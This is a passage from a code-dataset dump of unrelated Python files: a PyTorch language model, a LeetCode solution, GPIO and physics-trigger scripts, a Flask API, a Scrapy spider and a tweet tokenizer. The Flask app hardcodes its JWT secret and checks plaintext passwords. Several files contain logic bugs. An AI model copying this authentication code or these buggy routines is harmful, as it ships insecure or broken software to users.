[Variable(state.data) for state in states]\n\nfor epoch in range(5):\n print('*' * 10)\n print('epoch {}'.format(epoch))\n running_loss = 0\n if torch.cuda.is_available():\n states = (Variable(torch.zeros(1, 20, 
1024)).cuda(),\n Variable(torch.zeros(1, 20, 1024)).cuda())\n else:\n states = (Variable(torch.zeros(1, 20, 1024)),\n Variable(torch.zeros(1, 20, 1024)))\n for i in range(0, train_id.size(1) - 2 * seq_length, seq_length):\n input_x = train_id[:, i : (i + seq_length)]\n label = train_id[:, (i + seq_length):(i + 2 * seq_length)]\n if torch.cuda.is_available():\n input_x = Variable(input_x).cuda()\n label = Variable(label).cuda()\n else:\n input_x = Variable(input_x)\n label = Variable(label)\n # print(label.size(0), label.size(1))\n label = label.contiguous().view(label.size(0) * label.size(1), -1)\n states = detach(states)\n # forward\n out, states = model(input_x, states)\n loss = criterion(out, label.view(-1))\n running_loss += loss.data\n # backward\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm(model.parameters(), 0.5)\n optimizer.step()\n\n step = (i + 1) // seq_length\n if step % 100 == 0:\n print('epoch [{} / {}], step[{} / {}], loss: {}'.format(epoch+1, 5, step, num_batches, loss.data))\n print('Epoch {} Finished, loss:{}'.format(epoch+1, running_loss/(train_id.size(1) // seq_length - 1)))\n\n# Test model\nmodel.eval()\n# eval mode (batchnorm uses moving mean/variance instead of mini-batch mean/variance)\neval_loss = 0.0\neval_acc = 0.0\n\nwith torch.no_grad():\n if torch.cuda.is_available():\n states = (Variable(torch.zeros(1, 20, 1024)).cuda(),\n Variable(torch.zeros(1, 20, 1024)).cuda())\n else:\n states = (Variable(torch.zeros(1, 20, 1024)),\n Variable(torch.zeros(1, 20, 1024)))\n\n for i in range(0, test_id.size(1) - 2 * seq_length, seq_length):\n input_x = test_id[:, i: (i + seq_length)]\n label = test_id[:, (i + seq_length):(i + 2 * seq_length)]\n if torch.cuda.is_available():\n input_x = Variable(input_x).cuda()\n label = Variable(label).cuda()\n else:\n input_x = Variable(input_x)\n label = Variable(label)\n label = label.contiguous().view(label.size(0) * label.size(1), -1)\n states = detach(states)\n\n # forward\n out, 
states = model(input_x, states)\n test_loss = criterion(out, label.view(-1))\n\n step = (i + 1) // seq_length\n if step % 100 == 0:\n print('step[{}], loss: {}'.format(step, test_loss.data))\n print('Test Loss: {:.6f}'.format(eval_loss / (test_id.size(1) // seq_length - 1)))\n","sub_path":"PyTorch/07-Language-model/language_model.py","file_name":"language_model.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574605889","text":"# Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).\n\n# For example:\n# Given binary tree [3,9,20,null,null,15,7],\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# return its bottom-up level order traversal as:\n# [\n# [15,7],\n# [9,20],\n# [3]\n# ]\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n q = collections.deque\n q.append((root, 0))\n l = []\n\n while len(q) > 0:\n \tcurr, height = q.popleft()\n \tl.append((curr.val, height))\n \tif curr.left: q.append((curr.left, height+1))\n \tif curr.right: q.append((curr.right, height+1))\n\n currHeight = 0\n retval = []\n currLevel = []\n for p in l:\n \tif p[1] == currHeight:\n \t\tcurrLevel.append(p[0])\n \telse:\n \t\tretval.append(currLevel)\n \t\tcurrHeight = p[1]\n \t\tcurrLevel = [p[0]]\n\n return reversed(retval)","sub_path":"LC/Easy/107.py","file_name":"107.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539168712","text":"import RPi.GPIO as GPIO\r\nfrom time import sleep\r\n\r\nGPIO.setmode(GPIO.BCM) \t# BCM = numeração GPIO\r\n\r\noutA = 18\r\nGPIO.setup(outA, GPIO.OUT, 
initial=0)\r\ntempo = 1\r\ntry:\r\n print(\"CTRL+C para terminar\")\r\n while True:\r\n GPIO.output(outA, 1)\r\n print(\"GPIO\", outA, \": ON\")\r\n sleep(tempo)\r\n GPIO.output(outA, 0)\r\n print(\"GPIO %d : %s\" % (outA, \"OFF\")) #com formatação\r\n sleep(tempo)\r\n tempo+=1\r\nexcept KeyboardInterrupt:\r\n print(\"\\nPrograma terminado pelo utilizador.\")\t\t\r\nexcept:\r\n print(\"\\nErro!!!\")\r\nfinally:\r\n print(\"A fazer 'reset' ao GPIO...\", end=\"\")\r\n GPIO.cleanup()\r\n print(\"ok.\")\r\nprint(\"Fim do programa.\")\r\n","sub_path":"lab04ex06_out1.py","file_name":"lab04ex06_out1.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"589752549","text":"from Hlt2Lines.Utilities.Hlt2Combiner import Hlt2Combiner\nfrom Hlt2Lines.Utilities.Hlt2Filter import Hlt2ParticleFilter\nfrom HltTracking.HltPVs import PV3D\nfrom Inputs import UnbiasedPhi2KK, Hlt2Muons \n\nclass DisplPhiPhi(Hlt2Combiner):\n def __init__(self, name):\n\n inputs = [UnbiasedPhi2KK]\n\n dc = {}\n dc['phi(1020)'] = (\"(PT > %(PhiPT)s) \" \n \"& (MINTREE('K+'==ABSID,PT) > %(KPT)s) \" \n \"& (MINTREE('K+'==ABSID,BPVIPCHI2()) > %(KIPChi2)s) \" \n \"& (MAXTREE('K+'==ABSID,TRGHOSTPROB) < %(GhostProb)s) \" \n \"& (MINTREE('K+'==ABSID,PROBNNK) > %(KProbNNk)s) \" \n \"& (VFASPF(VCHI2PDOF) < %(VChi2)s) \" \n \"& (in_range( PDGM('phi(1020)') - %(PhiMassWindow)s , M , PDGM('phi(1020)') + %(PhiMassWindow)s ) )\") \n\n mc = (\"(HASVERTEX)\"\n \"& (VFASPF(VCHI2) < %(VChi2)s) \"\n \"& (BPVVDCHI2 > %(FDChi2)s)\") \n\n Hlt2Combiner.__init__(self, name, \"B0 -> phi(1020) phi(1020)\", inputs,\n dependencies = [PV3D('Hlt2')],\n tistos = 'TisTosSpec',\n DaughtersCuts = dc,\n #CombinationCut = cc,\n MotherCut = mc,\n Preambulo = [])\n \n\nclass SharedDiMuonNoIP(Hlt2Combiner) :\n def __init__(self, name):\n\n inputs = [Hlt2Muons]\n \n dc = {}\n dc['mu+'] = (\"(PT > %(MuPT)s) \" \n \"& (P > %(MuP)s) \" \n \"& (TRGHOSTPROB 
< %(GhostProb)s) \" \n \"& (PROBNNmu > %(MuProbNNmu)s) \") \n cc = \"(AMAXDOCA('') < %(DOCA)s)\" \n mc = \"(VFASPF(VCHI2PDOF) < %(VChi2)s) \" \n\n Hlt2Combiner.__init__(self, name, \"KS0 -> mu+ mu-\", inputs,\n dependencies = [PV3D('Hlt2')],\n DaughtersCuts = dc,\n CombinationCut = cc,\n MotherCut = mc,\n Preambulo = [],\n shared = True)\n\n \nclass QuadMuonNoIP(Hlt2Combiner):\n def __init__(self, name, inputs):\n\n cc = \"APT > %(PT)s\"\n mc = (\"(HASVERTEX)\" \n \"& (VFASPF(VCHI2) < %(VChi2)s) \") \n Hlt2Combiner.__init__(self, name, \"B0 -> KS0 KS0\", inputs,\n dependencies = [PV3D('Hlt2')],\n #DaughtersCuts = dc,\n CombinationCut = cc,\n MotherCut = mc,\n Preambulo = [])\n\n\nclass DisplDiMuon(Hlt2ParticleFilter):\n def __init__(self, name, inputs):\n\n code = (\"(MINTREE('mu+'==ABSID,BPVIPCHI2()) > %(MuIPChi2)s)\"\n \"& (MINTREE('mu+'==ABSID,PROBNNmu) > %(MuProbNNmu)s)\" \n \"& (PT > %(PT)s)\" \n \"& (HASVERTEX)\" \n \"& (BPVIPCHI2() < %(IPChi2)s)\" \n \"& (BPVVDCHI2 > %(FDChi2)s)\") \n Hlt2ParticleFilter.__init__(self, name, code, inputs, dependencies = [PV3D('Hlt2')])\n\n\nclass DisplDiMuonNoPoint(Hlt2ParticleFilter):\n def __init__(self, name, inputs):\n\n code = (\"(MINTREE('mu+'==ABSID,BPVIPCHI2()) > %(MuIPChi2)s)\" \n \"& (MINTREE('mu+'==ABSID,PROBNNmu) > %(MuProbNNmu)s)\" \n \"& (PT > %(PT)s)\" \n \"& (HASVERTEX)\" \n \"& (BPVVDCHI2 > %(FDChi2)s)\") \n Hlt2ParticleFilter.__init__(self, name, code, inputs, dependencies = [PV3D('Hlt2')])\n\n\n\nclass PrmptDiMuon(Hlt2ParticleFilter):\n def __init__(self, name, inputs, highmass = False):\n\n code = ''\n if highmass: code = '(M > %(M)s) &'\n code += (\"(MINTREE('mu+'==ABSID,PT) > %(MuPT)s) & (MINTREE('mu+'==ABSID,P) > %(MuP)s)\" \n \"& (MINTREE('mu+'==ABSID,BPVIPCHI2()) < %(MuIPChi2)s)\" \n \"& (MINTREE('mu+'==ABSID,PROBNNmu) > %(MuProbNNmu)s)\" \n \"& (PT > %(PT)s)\" \n \"& (HASVERTEX)\" \n \"& (BPVVDCHI2 < %(FDChi2)s)\") \n Hlt2ParticleFilter.__init__(self, name, code, inputs, dependencies = 
[PV3D('Hlt2')])\n\n\nclass PrmptDiMuonSS(Hlt2Combiner) :\n def __init__(self, name):\n\n inputs = [Hlt2Muons]\n \n dc = {}\n dc['mu+'] = (\"(PT > %(MuPT)s) \" \n \"& (P > %(MuP)s) \" \n \"& (BPVIPCHI2() < %(MuIPChi2)s) \" \n \"& (TRGHOSTPROB < %(GhostProb)s) \" \n \"& (PROBNNmu > %(MuProbNNmu)s) \") \n cc = \"(APT > %(PT)s) & (AMAXDOCA('') < %(DOCA)s)\" \n mc = (\"(VFASPF(VCHI2PDOF) < %(VChi2)s) \" \n \"& (PT > %(PT)s)\" \n \"& (HASVERTEX)\" \n \"& (BPVVDCHI2 < %(FDChi2)s)\")\n\n Hlt2Combiner.__init__(self, name, \"[KS0 -> mu+ mu+]cc\", inputs,\n dependencies = [PV3D('Hlt2')],\n DaughtersCuts = dc,\n CombinationCut = cc,\n MotherCut = mc,\n Preambulo = [])\n","sub_path":"Hlt/Hlt/Hlt2Lines/python/Hlt2Lines/Exotica/Stages.py","file_name":"Stages.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312412976","text":"\"\"\"\nThis module takes care of starting the API Server, Loading the DB and Adding the endpoints\n\"\"\"\nimport os\nfrom flask import Flask, request, jsonify, url_for\nfrom flask_migrate import Migrate\nfrom flask_swagger import swagger\nfrom flask_cors import CORS\nfrom utils import APIException, generate_sitemap\nfrom admin import setup_admin\nfrom models import db, User, People, Planets, Vehicles\n##\nfrom flask_jwt_extended import JWTManager, create_access_token\n##\n\napp = Flask(__name__)\n##\napp.config[\"JWT_SECRET_KEY\"] = \"\\xb1}\\xea\\xf5\\xad\\xbf\\xda2|\\xaaII7|$\\xef\\x84q\\x80\\x11t\\x08p\\xb5\\xf4\\x0f\\x81\\x89\\xfb:\\xb3\\x8c\" # Change this \"super secret\" with something else!\njwt = JWTManager(app)\n##\n\napp.url_map.strict_slashes = False\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DB_CONNECTION_STRING')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\nMIGRATE = Migrate(app, db)\ndb.init_app(app)\nCORS(app)\nsetup_admin(app)\n\n# Handle/serialize errors like a JSON object\n@app.errorhandler(APIException)\ndef 
handle_invalid_usage(error):\n return jsonify(error.to_dict()), error.status_code\n\n# generate sitemap with all your endpoints\n@app.route('/')\ndef sitemap():\n return generate_sitemap(app)\n\n#Token\n\n@app.route(\"/token\", methods=[\"POST\"])\ndef create_token():\n username = request.json.get(\"username\", None)\n password = request.json.get(\"password\", None)\n # Query your database for username and password\n user = User.query.filter_by(username=username, password=password).first()\n if user is None:\n # the user was not found on the database\n return jsonify({\"msg\": \"Bad username or password\"}), 401\n \n # create a new token with the user id inside\n access_token = create_access_token(identity=user.id)\n return jsonify({ \"token\": access_token, \"user_id\": user.id })\n\n#Users\n\n@app.route('/user', methods=['GET'])\ndef getAllUsers():\n all_users = User.query.all()\n all_users = list(map(lambda x: x.serialize(), all_users))\n \n return jsonify(all_users), 200\n\n@app.route('/user', methods=['POST'])\ndef addUser():\n username = request.json['username']\n existingUser = User.query.filter_by(username=username)\n if existingUser == None:\n return \"Creation error!! 
User already exists\", 400\n else:\n password = request.json['password']\n is_active = False \n new_user = User(username, password, is_active)\n db.session.add(new_user) \n db.session.commit()\n\n return jsonify(new_user.serialize()), 200\n\n#People\n\n@app.route('/people', methods=['POST'])\ndef addPerson():\n\n name = request.json['name']\n birth_year = request.json['birth_year']\n eye_color = request.json['eye_color']\n gender = request.json['gender']\n hair_color = request.json['hair_color']\n height = request.json['height']\n mass = request.json['mass']\n skin_color = request.json['skin_color']\n homeworld = request.json['homeworld']\n item_type = \"people\"\n\n new_person = People(name, birth_year, eye_color, gender, hair_color, height, mass, skin_color, homeworld, item_type)\n db.session.add(new_person)\n db.session.commit()\n \n return jsonify(new_person.serialize()), 200\n\n@app.route('/people', methods=['GET'])\ndef getAllPeople():\n all_people = People.query.all()\n all_people = list(map(lambda x: x.serialize(), all_people))\n \n return jsonify(all_people), 200\n\n@app.route('/people/')\ndef getPersonByName(aName):\n person = People.query.filter_by(name=aName)\n person = list(map(lambda x: x.serialize(), person))\n return jsonify(person), 200\n\n@app.route('/people/')\ndef getPersonById(id):\n person = People.query.filter_by(id=id)\n person = list(map(lambda x: x.serialize(), person))\n return jsonify(person), 200 \n\n@app.route('/people/', methods=['PUT'])\ndef updatePersonById(id):\n person = People.query.filter_by(id=id).first()\n \n name = request.json['name']\n birth_year = request.json['birth_year']\n eye_color = request.json['eye_color']\n gender = request.json['gender']\n hair_color = request.json['hair_color']\n height = request.json['height']\n mass = request.json['mass']\n skin_color = request.json['skin_color']\n homeworld = request.json['homeworld']\n\n person.name = name\n person.birth_year = birth_year\n person.eye_color = eye_color\n 
person.gender = gender\n person.hair_color = hair_color\n person.height = height\n person.mass = mass\n person.skin_color = skin_color\n person.homeworld = homeworld\n \n db.session.commit()\n return jsonify(person), 200 \n\n@app.route('/people/', methods=['DELETE'])\ndef deletePersonById(id):\n person = People.query.filter_by(id=id).first()\n db.session.delete(person)\n db.session.commit()\n return \"Person deleted successfully!\", 200\n\n#Planets\n\n@app.route('/planets', methods=['POST'])\ndef addPlanet():\n\n name = request.json['name']\n diameter = request.json['diameter']\n rotation_period = request.json['rotation_period']\n orbital_period = request.json['orbital_period']\n gravity = request.json['gravity']\n population = request.json['population']\n climate = request.json['climate']\n terrain = request.json['terrain']\n surface_water = request.json['surface_water']\n item_type = \"planet\"\n\n new_planet = Planets(name, diameter, rotation_period, orbital_period, gravity, population, climate, terrain, surface_water, item_type)\n db.session.add(new_planet)\n db.session.commit()\n \n return jsonify(new_planet.serialize()), 200\n\n@app.route('/planets', methods=['GET'])\ndef getAllPlanets():\n all_planets = Planets.query.all()\n all_planets = list(map(lambda x: x.serialize(), all_planets))\n return jsonify(all_planets), 200\n\n@app.route('/planets/')\ndef getPlanetsByName(aName):\n planet = Planets.query.filter_by(name=aName)\n planet = list(map(lambda x: x.serialize(), planet))\n return jsonify(planet), 200\n\n@app.route('/planets/')\ndef getPlanetById(id):\n planet = Planets.query.filter_by(id=id)\n planet = list(map(lambda x: x.serialize(), planet))\n return jsonify(planet), 200\n\n@app.route('/planet/')\ndef updatePlanet(id):\n planet = Planets.query.filter_by(id=id)\n name = request.json['name']\n diameter = request.json['diameter']\n rotation_period = request.json['rotation_period']\n orbital_period = request.json['orbital_period']\n gravity = 
request.json['population']\n climate = request.json['climate']\n terrain = request.json['terrain']\n surface_water = request.json['surface_water']\n \n db.session.commit()\n \n return jsonify(planet.serialize()), 200\n\n@app.route('/planets/', methods=['DELETE'])\ndef deletePlanetById(id):\n planet = Planets.query.filter_by(id=id).first()\n db.session.delete(planet)\n db.session.commit()\n return \"Planet deleted successfully!\", 200\n\n#Vehicles\n\n@app.route('/vehicles', methods=['POST'])\ndef addVehicle():\n name = request.json['name']\n model = request.json['model']\n manufacturer = request.json['manufacturer']\n length = request.json['length']\n cost_in_credits = request.json['cost_in_credits']\n crew = request.json['crew']\n passengers = request.json['passengers']\n max_atmosphering_speed = request.json['max_atmosphering_speed']\n cargo_capacity = request.json['cargo_capacity']\n consumables = request.json['consumables']\n item_type = \"vehicle\"\n\n new_vehicle = Vehicles(name, model, manufacturer, length, cost_in_credits, crew, passengers, max_atmosphering_speed, cargo_capacity, consumables, item_type)\n db.session.add(new_vehicle)\n db.session.commit()\n \n return jsonify(new_vehicle.serialize()), 200\n\n@app.route('/vehicles', methods=['GET'])\ndef getAllVehicles():\n all_vehicles = Vehicles.query.all()\n all_vehicles = list(map(lambda x: x.serialize(), all_vehicles))\n \n return jsonify(all_vehicles), 200\n\n@app.route('/vehicles/')\ndef getVehicleByName(aName):\n all_vehicles = Vehicles.query.filter_by(name=aName)\n all_vehicles = list(map(lambda x: x.serialize(), all_vehicles))\n return jsonify(all_vehicles), 200\n\n@app.route('/vehicles/')\ndef getVehicleById(id):\n all_vehicles = Vehicles.query.filter_by(id=id)\n all_vehicles = list(map(lambda x: x.serialize(), all_vehicles))\n return jsonify(all_vehicles), 200 \n\n@app.route('/vehicles/', methods=['DELETE'])\ndef deleteVehicleById(id):\n vehicle = Vehicles.query.filter_by(id=id).first()\n 
db.session.delete(vehicle)\n db.session.commit()\n return \"Vehicle deleted successfully!\"\n\n# this only runs if `$ python src/main.py` is executed\nif __name__ == '__main__':\n PORT = int(os.environ.get('PORT', 3000))\n app.run(host='0.0.0.0', port=PORT, debug=False)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393689171","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpider类:\n class scrapy.Spider是最基本的类,所有编写的爬虫必须继承这个类,其定义了如何爬取某个(或某些)网站\n 包括爬取动作(例如:是否跟进链接)以及如何从网页的内容中提取结构化数据(item字段)\n\n主要函数及调用顺序:\n__init__():\n 初始化爬虫名字和start_urls列表\nstart_requests():\n 调用make_requests_from_url()方法,生成Requests对象交给Scrapy下载并返回response\nparse():\n 解析response,并返回Item或Requests(需指定回调函数);Item传给Item pipline持久化\n Requests交由Scrapy下载,并由指定的回调函数处理(默认parse()),一直循环直到处理完所有的数据为止;\n\n主要属性和方法\nname:\n 定义spider名字,比如爬取mywebsite.com,该spider通常会被命名为mywebsite,具有唯一性\nallowed_domains:\n 包含了spider允许爬取的域名(domain)的列表,可选\nstart_urls:\n 初始URL元组/列表,当没有指定特定URL时,spider将从该列表中开始爬取\nstart_requests(self):\n 当spider启动爬取并且未指定start_urls时才会调用该方法,返回一个Request对象\nparse(self, response):\n 默认的Request对象回调函数,用来处理网页返回的response信息,生成Item或者新的Request对象\n\nparse()方法工作机制:\n1、方法结尾是yield而不是return,parse()方法将会被当做一个生成器使用;scrapy会逐一获取parse方法中生成的结果并判断类型\n 如果是request就加入爬取队列,是item类型就使用pipeline处理,其他类型则返回错误信息\n2、scrapy取到新的request并不会立马发送,而是先将其放入队列,然后接着从生成器里获取,直到取尽第一部分的request\n 然后再获取第二部分的item,取到item了,就会放到对应的pipeline处理\n3、parse()方法作为回调函数(callback)赋值给了Request,指定parse()方法来处理这些请求scrapy.Request(url, callback=self.parse)\n4、Request对象经过调度,执行生成 scrapy.http.response()的响应对象,并送回给parse()方法,直到调度器中没有Request(递归)\n 取尽之后,parse()工作结束,引擎再根据队列和pipelines中的内容去执行相应的操作\n5、程序在取得各个页面的items前,会先处理完之前所有的request队列里的请求,然后再提取items\n\"\"\"\n\nimport scrapy\nfrom myspider.items import MyspiderItem\n\n\nclass ItcastSpider(scrapy.Spider):\n \"\"\"\n 爬虫程序:解析scrapy引擎返回的Response,默认由parse()函数解析\n \"\"\"\n\n # 爬虫名称\n name = 'itcast'\n # 爬虫的约束区域\n 
allowed_domains = ['www.itcast.cn']\n # 起始url列表\n start_urls = ['http://www.itcast.cn/channel/teacher.shtml#ajavaee']\n\n # 解析返回的网页数据(response.body),提取结构化数据(生成item)\n def parse(self, response):\n # 创建item对象保存数据\n item = MyspiderItem()\n\n # print(type(response)) # \n # print(response.headers)\n # print(response.body.decode(\"utf-8\"))\n\n # 教师列表:scrapy自带xpath功能\n teachers = response.xpath(\"//div[@class='li_txt']\")\n # print(type(teacher_list)) # \n print(teachers)\n\n # 存放所有教师信息的集合\n # items = []\n\n # 遍历列表\n for each in teachers:\n # print(type(each)) # \n\n # print(type(item)) # \n\n # extract()方法返回unicode字符串,不加extract()方法返回的还是Selector\n name = each.xpath(\"./h3/text()\")[0].extract()\n title = each.xpath(\"./h4/text()\")[0].extract()\n info = each.xpath(\"./p/text()\")[0].extract()\n\n item[\"name\"] = name\n item[\"title\"] = title\n item[\"info\"] = info\n\n # 添加单个老师信息到集合\n # items.append(item)\n\n # 将获取的数据交给pipeline\n yield item\n\n # 直接返回数据,不经过pipeline\n # return items\n\n\n\n","sub_path":"myspider/spiders/itcast.py","file_name":"itcast.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262344227","text":"import re\nimport sys\nimport NLPlib\n\n# Dictionary mapping HTML codes to ascii (used in replace_with_ascii)\nhtml_to_ascii = {'"': '\"',\n '™': 'trademark',\n '&': '&',\n '⁄': '/',\n ''': \"'\",\n '>': '>',\n '<': '<',\n '–': '-',\n '—': '--',\n '¢': 'cent',\n '£': 'pound',\n '¥': 'yen',\n '§': 'section',\n '©': 'copyright',\n '¬': 'not',\n '®': 'registered trademark',\n '°': 'degree',\n }\n\ndef run_twtt(read_from, write_to):\n\t'''(filename, filename) -> NoneType\n\tGiven name of the tweet file (read_from) and the name of the file to\n\toutput results to (write_to), run all necessary modifications on the\n\ttweets in the tweet file and then write out the results to the\n\toutput file, separated by newlines and an \"|\".'''\n\t\n\tread_file = 
open(read_from, \"r\")\n\tall_tweets = read_file.readlines() #Each element of list is a tweet\n\tread_file.close()\n\twrite_file = open(write_to, \"w\")\n\t\n\t# Go through all the tweets, filter them and write them out\n\tfor j in range(len(all_tweets)):\n\t\tfiltered_tweet = filter_tweet(all_tweets[j])\n\t\twrite_file.write(filtered_tweet)\n\t\tif j < len(all_tweets)-1: # Don't put \"|\" after last tweet\n\t\t\twrite_file.write('\\n|\\n') # Separate tweets with \"|\"\n\t\n\twrite_file.close()\n\t\ndef filter_tweet(tweet):\n\t'''str -> str\n\tGiven a tweet, return a tweet modified with all HTML code removed,\n\tURLS removed, tags removed, tokens split by spaces, and tagged with\n\tNLPlib.'''\n\t\n\ttweet = delete_html(tweet)\n\ttweet = replace_with_ascii(tweet)\n\ttweet = delete_url(tweet)\n\ttweet = delete_twitter_tags(tweet)\n\ttweet = split_sentences(tweet)\n\ttweet = separate_clitics_and_punctuation(tweet)\t\n\ttweet = tag(tweet)\n\t\n\treturn tweet\n\ndef delete_html(tweet):\n\t''' str -> str\n\tGiven a tweet, return a modified tweet with HTML tags removed.\n\tex: Link to image becomes just\n\t\"Link to image\".'''\n\t\n\t# Look for substring that begins with < and ends in >; remove all \n\t# in between and the arrows themselves.\n\treturn re.sub(r'<[^>]*>', '', tweet)\n\ndef replace_with_ascii(tweet):\n\t''' str -> str\n\tGiven a tweet, return a modified tweet with HTML friendly codes\n\treplaced with their ascii equivalents.\t(ex: & -> &)'''\n\t\n\t# Go through all html codes in global dict html_to_ascii\n\t# and replace them with their ascii equivalent if found in tweet\n\tfor (html_code, ascii) in html_to_ascii.items():\n\t\ttweet = tweet.replace(html_code, ascii)\n\t\t\n\treturn tweet\n\ndef delete_url(tweet):\n\t'''str -> str\n\tGiven a tweet, return a modified tweet with URLs removed.'''\n\t\n\t# Remove substring from tweet if it begins with www/html(etc..)\n\t# and ends in a space or end of string; remove shortened links too.\n\treturn 
re.sub(r'(www|www2|www3|http|https|\\w+\\.\\w+\\/\\w+).*?($| )', '', tweet, \n\t flags=re.IGNORECASE)\n\ndef delete_twitter_tags(tweet):\n\t''' str -> str\n\tGiven a tweet, return a modified tweet with the first character of\n\tusernames (ex: @michael -> michael) and hashtags (ex: #2015 -> 2015)\n\tremoved.'''\n\t\n\t# Find all substrings in tweet that begin w/ @/# and have chars after\n\tlist_of_tags = re.findall(r'(?:@|#)\\w+', tweet)\n\t\n\t# Replace the found substrings with the tags removed.\t\n\tfor tag in list_of_tags:\n\t\ttweet = tweet.replace(tag, tag[1:])\n\t\t\n\treturn tweet\n\t\ndef split_sentences(tweet):\n\t''' str -> str\n\tGiven a tweet, return a modified tweet which has sentences\n\tput onto new lines. Sentences are not split up on the basis of \n\tconsecutive punctuation, decimal numbers and quotations.'''\n\t\n\tlist_of_words = tweet.split()\n\tformatted_tweet = '' # Resulting tweet after formatting is done\n\t\n\tfor word in list_of_words:\n\t\t# Don't put newline after an abbreviation\n\t\tif word in list_of_abbrev: \n\t\t\tformatted_tweet += word + ' '\n\t\telse: # Not an abbreviation\n\t\t\ttemp_word = word # Amend temp_word with newlines\n\t\t\tfor punc in ('.', '!', '?'):\n\t\t\t\tpunc_index = temp_word.rfind(punc)\n\t\t\t\tif (punc_index < 0): # No punctuation found\n\t\t\t\t\tpass\n\t\t\t\telif punc_index == len(temp_word)-1: # Punc is last char in word\n\t\t\t\t\t# Ensure char before it is not a punctuation\n\t\t\t\t\tif (len(temp_word) > 1 and temp_word[-2] not in ('!', '?', '.', '\\n', '\"', \"'\")):\n\t\t\t\t\t\ttemp_word = temp_word[:-1] + \" \" + temp_word[-1] + \"\\n\"\n\t\t\t\telse: # Punc is in middle of word\n\t\t\t\t\t# Don't add \"\\n\" for \"?!?!\", decimal nums or quotes\n\t\t\t\t\tif (temp_word[punc_index+1] in ('!', '?', '.', '\\n', '\"', \"'\")) or\t\\\n\t\t\t\t\t (punc_index >0 and punc == '.' 
and temp_word[punc_index-1].isdigit() and temp_word[punc_index+1].isdigit()):\n\t\t\t\t\t\tpass\n\t\t\t\t\telse: # Punc is in middle of word but not abbreviation\n\t\t\t\t\t\tpass\n\t\t\t\t\t\t#temp_word = temp_word[:punc_index+1] + \"\\n\" + temp_word[punc_index+1:]\n\t\t\t# Don't put newspace after newline character\n\t\t\tif temp_word and temp_word[-1] != \"\\n\":\t\t\t\n\t\t\t\tformatted_tweet += temp_word + ' '\n\t\t\telse:\n\t\t\t\tformatted_tweet += temp_word\n\treturn formatted_tweet.strip()\n\ndef separate_clitics_and_punctuation(tweet):\n\t'''str -> str\n\tGiven a tweet, return a modified tweet with each token separated by\n\tspaces. This function specifically handles the cases of clitics and\n\tpunctuations, as words had already been separated in split_sentences.\n\t'''\n\t\n\t# Regular expression matching a word followed by any combo of punc.\n\treg_exp = r\"(\\w+)((?:\\;+|\\:+|\\!+|\\?+|[^\\.\\w+]\\.+(?: |$)|\\,+)+)\"\n\t# Loop while tweet has unspaced punctuations\n\twhile re.findall(reg_exp, tweet):\n\t\t# group 1 is word; group 2 is the punctuation \n\t\tclitics = re.search(reg_exp, tweet)\n\t\tsplitted_by_space = clitics.group(1) + ' ' + clitics.group(2)\n\t\t# Only replace first occurrence\n\t\ttweet = re.sub(reg_exp, splitted_by_space, tweet, 1)\n\t\t\n\t# Space parentheses & double quotes\n\ttweet = tweet.replace(\"(\", \" ( \")\n\ttweet = tweet.replace(\")\", \" ) \")\n\ttweet = tweet.replace('\"', ' \" ')\n\n\t# Split on clitics and join again but with space before clitics\n\tclitics_separated_list = re.split(\"\\'\", tweet)\n\treturn \" '\".join(clitics_separated_list)\n\t\ndef tag(tweet):\n\t'''str -> str\n\tGiven a tweet, return a modified tweet with the tokens tagged with\n\ttheir part-of-speech using NLPlib.'''\n\t\n\tsentences_list = tweet.split(\"\\n\")\n\tresult_tweet = ''\n\t\n\tfor sentence in sentences_list:\n\t\t# Source: tagging code from assignment page\n\t\tsent = sentence.split()\n\t\ttags = tagger.tag(sent)\n\t\t# Retrieve 
tags and append to token\n\t\tfor j in range(len(tags)):\n\t\t\tsent[j] += '/' + tags[j]\n\t\tresult_tweet += ' '.join(sent) + \"\\n\"\n\treturn result_tweet.rstrip()\n\t\t\n\t\n##################### HELPER FUNCTIONS #########################\t\t\t\ndef create_abbrev_list(list_of_filenames):\n\t''' list of filenames -> list of abbreviations\n\tReturn a list of abbreviations given a list of names of files\n\tthat contain them.'''\n\t\n\tlist_of_abbrev = []\n\tfor filename in list_of_filenames:\n\t\tabbrev_file = open(filename, 'r')\n\t\tfor line in abbrev_file:\n\t\t\tlist_of_abbrev.append(line.strip())\n\t\tabbrev_file.close()\n\treturn list_of_abbrev\n\t\t\nif __name__ == \"__main__\":\n\t# Build list of abbreviations\n\tlist_of_abbrev = create_abbrev_list([\"abbrev.english\", \"pn_abbrev.english\"])\n\t# Unpickle dictionary\n\ttagger = NLPlib.NLPlib()\t\n\t# Read from tweet file, make modifications and then write out\n\trun_twtt(sys.argv[1], sys.argv[2])\n","sub_path":"Tweet Classifier/twtt.py","file_name":"twtt.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"654394733","text":"from math import inf\n\np = input(\"Enter matrix dimensions' array separated by space: \").split(\" \")\np = [int(i) for i in p]\nn = len(p) - 1\n\ntable = [[inf for i in range(n + 